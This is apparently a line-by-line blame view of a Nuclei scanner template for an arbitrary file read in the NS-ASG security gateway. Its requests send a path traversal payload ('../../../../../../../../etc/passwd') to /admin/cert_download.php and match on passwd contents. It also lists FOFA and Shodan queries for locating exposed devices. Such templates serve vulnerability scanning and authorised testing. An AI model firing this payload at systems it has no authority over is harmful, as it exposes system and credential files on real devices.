2021-06-01 08:39:01 +00:00
|
|
|
id: nsasg-arbitrary-file-read
|
2021-05-31 08:56:01 +00:00
|
|
|
|
|
|
|
info:
|
2021-06-01 08:39:01 +00:00
|
|
|
name: NS ASG Arbitrary File Read
|
2022-04-07 08:54:10 +00:00
|
|
|
author: pikpikcu,ritikchaddha
|
2021-05-31 08:56:01 +00:00
|
|
|
severity: high
|
2022-04-07 08:53:54 +00:00
|
|
|
reference:
|
|
|
|
- https://zhuanlan.zhihu.com/p/368054963
|
|
|
|
- http://wiki.xypbk.com/Web安全/网康%20NS-ASG安全网关/网康%20NS-ASG安全网关%20任意文件读取漏洞.md
|
|
|
|
metadata:
|
|
|
|
fofa-query: app="网康科技-NS-ASG安全网关"
|
|
|
|
shodan-query: http.title:“NS-ASG”
|
2021-06-01 08:39:01 +00:00
|
|
|
tags: nsasg,lfi
|
2021-05-31 08:56:01 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd"
|
2022-04-07 08:44:15 +00:00
|
|
|
- "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php"
|
2021-05-31 08:56:01 +00:00
|
|
|
|
2022-04-07 08:53:54 +00:00
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: or
|
2021-05-31 08:56:01 +00:00
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2022-03-22 08:01:31 +00:00
|
|
|
- "root:.*:0:0:"
|
2022-04-07 09:01:10 +00:00
|
|
|
|
2022-04-07 08:44:15 +00:00
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- "$certfile"
|
|
|
|
- "application/pdf"
|
2022-04-07 08:53:54 +00:00
|
|
|
condition: and
|